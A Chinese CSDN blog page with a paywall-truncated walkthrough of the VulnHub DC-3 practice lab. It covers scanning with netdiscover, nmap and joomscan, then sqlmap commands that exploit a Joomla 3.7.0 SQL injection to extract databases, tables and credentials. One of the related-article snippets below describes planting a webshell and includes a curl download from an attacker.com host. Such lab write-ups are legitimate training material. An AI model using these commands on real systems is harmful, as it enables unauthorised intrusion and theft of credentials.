Vulnhub DC-3靶场

已于 2023-06-11 00:11:31 修改
阅读量999 收藏
点赞数
分类专栏: vulnhub 靶场攻略 文章标签: 安全
于 2022-11-14 17:14:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47019868/article/details/127821464
版权

目录

 

搭建靶场

发现目标

信息收集

漏洞利用

内网提权

Flag1

搭建靶场

靶场下载地址

DC: 3.2 ~ VulnHub

下载解压文件,并使用虚拟机软件 创建目标

发现目标

netdiscover -r 192.168.226.0/24

发现目标对象 为 :192.168.226.142

信息收集

nmap -sS -sV -A -T4 -p- 192.168.226.142

使用nmap查看目标 开启了那些端口与服务

指纹信息收集

使用Joomscan进行扫描

 网站目录收集

漏洞利用

根据信息收集的资料 网站采用Joomls 框架搭建 版本为 3.7.0

搜集相关的漏洞

 使用SQLmap 对其进行库名探测

sqlmap -u "http://192.168.226.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

 

 使用sqlmap 获取joomladb库中的表

sqlmap -u "http://192.168.226.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb --tables

 使用sqlmap获取用户表中的内容

sqlmap -u "http://192.168.226.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T '#__users' --columns

 使用sqlmap获取账号与密码

sqlmap -u "http://192.168.226.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -
最低0.47元/天 解锁文章
RLXn0cC
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub-DC-3靶场渗透练习
weixin_52451257的博客
11-17 2925
Vulnhub-DC-3 1105 DC-3 靶场地址: https://www.vulnhub.com/entry/dc-32,312/ 第一步:信息收集 nmap -sn 192.168.231.0/24 nmap -A -p- 192.168.231.141 dirb http://192.168.231.141 nikto -h http://192.168.231.141 去了日常四件套进行信息收集还可以通过joomscan工具对网站进行扫描 joomsc...
CVE-2017-5638漏洞利用
wuxinweii的博客
06-04 4111
实验准备 :一台Kali主机,一台ubuntu主机,docker中vulhub/struts2:2.3镜像 1、打开docker,开启vulhub/struts2:2.3镜像 dockers run -d -p 8080:8080 vulhub/struts2:2.3 启动镜像容器,映射本地的8080端口。 2.查看能否访问端口 3.扫描主机,查看是否存在CVE-2017-5638漏洞 可以选择nessus扫描主机来确定是否存在该漏洞,这里已经确定存在CVE-2017-5638漏洞,就省略了此步骤,有需
DC-3靶场搭建及渗透实战详细过程(DC靶场系列)
金 帛的博客
07-27 5270
DC-3靶场渗透过程
DC-3靶机
Flamingo1998的博客
02-16 437
DC-3靶机
DC-3靶场
2301_76690905的博客
12-14 199
cp /usr/share/exploitdb/exploits/php/webapps/42033.txt /home/kali/桌面/42033.txt。cp /usr/share/exploitdb/exploits/linux/local/39772.txt /home/kali/桌面/39772.txt。下载后解压会有一个DC-3.ova文件,直接在vm虚拟机点击左上角打开-->文件--.选中这个.ova文件就能创建靶场,kali和靶机都调整至NAT模式。使用“-v”(详细)来尝试更多的组合。
vulnhub靶机 ReconForce
witwitwiter的博客
09-18 2783
vulnhub靶机 ReconForce 靶机地址hackNos: ReconForce (v1.1) ~ VulnHub 目标为user.txt和root.txt 靶机配置 将靶机下载好后。在VM中选择打开虚拟机,在开启虚拟机之前,网络设置中调整为nat(与攻击机kali一个网段)。 渗透测试 使用nmap进行扫描 └─# nmap -p- -sV -sT -T4 192.168.5.132 Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-17 09:
vulnhub靶场实战系列-DC-3实战
05-20
vulnhub靶场实战系列-DC-3实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vulnhub靶场实战系列-DC-1实战流程图
05-17
靶机 DC-3
m0_66299232的博客
09-15 260
DC系列,joomscan,靶机,ssh登录,sqlmap,john解密,内核漏洞提权,nmap
DC-3 靶机
weixin_63492470的博客
03-11 5402
DC-3 DC-3 | Five86 | DC Challenges (靶机下载地址) 环境:DC-3靶机地址:192.168.1.152 kali地址:192.168.1.176 都是桥接模式 1 .收集信息 nmap -sP 192.168.1.0/24 nmap -A 192.168.1.152 #发现joomla内容管理系统 访问 192.168.1.152 #发现 提示只有一个入口,让我们提权为root用户 知道网站用的是joomla cms,那我们就可以使用
修改rds_backup_extract.sh还原RDS mysql8以及错误处理
weixin_43628593的博客
03-14 1100
背景 在做RDS自动化restore到本地的时候,下载了阿里云提供的脚本:rds_backup_extract.sh 但是遇到了一个问题,就是这个脚本不支持xbstream 文件包(_qp.xb 后缀)。这样对于mysql8.0或者mysql5.6的新备份的时候,就不能识别了: if [[ $backup_file == *.xb.gz ]]; then format="xbstream"...
python subprocess pipe_Python2.x subprocess.Popen的Broken pipe解决方法
weixin_39759060的博客
12-21 258
考虑如下代码:#!/usr/bin/env pythonp1 = Popen(["cat", "somebigfile"], stdout = PIPE)p2 = Popen(["head"], stdin = p1.stdout, stdout = PIPE)print p2.communicate()[0]会出现cat: write error: Broken pipe原因是在Unix-lik...
Linux之系统排错
bread_winner的博客
08-15 408
MBR主导分区损坏 模拟问题:dd if=/dev/zero of=/dev/vda bs=446 count=1 当你重启电脑后会出现以下错误,系统无法正常开机 前提条件----------------必须要有一个与系统相同的镜像 解决方案 (1)真机执行virt-manager,选择grub2出现错误的虚拟机,并关闭虚拟机; (2)点击灯泡,根据虚拟机版本添加光驱(如7.3的系统光驱为7...
大坝安全监测设备有哪些主要功能?
最新发布
yyth13276363312的博客
07-24 253
12。3. **实时预警和报警处理**:提供精准的安全预警信息,及时处理可能的危险情况12。1. **实时监测大坝的各项物理参数**:包括应变、位移、水位、流量等12。6. **环境量监测**:包括上/下游水位、气温、降水量等11
DC-5靶场渗透过程中,怎样挂载木马文件
06-02
DC-5 靶场渗透过程中,如果要挂载木马文件,可以按照以下步骤进行操作: 1. 找到可写入的目录:可以使用 `ls -al` 命令查看目录权限,找到可写入的目录。通常会有一些临时目录或者上传目录是可写入的。 2. 上传木马文件:将自己准备好的木马文件上传到可写入的目录中。可以使用 `curl` 或者 `wget` 命令进行上传,例如: ``` curl -o shell.php http://attacker.com/shell.php ``` 上述命令会将 `shell.php` 文件下载到本地,并保存到当前目录下。 3. 运行木马文件:在浏览器中访问上传的木马文件,例如 `http://dc5/wordpress/wp-content/plugins/akismet/views/akismet.php`。如果一切正常,就可以获得一个远程 shell,并在目标系统中执行任意命令了。 需要注意的是,这种做法是违法的,仅用于学习和研究目的,切勿在未授权的情况下对他人的系统进行攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值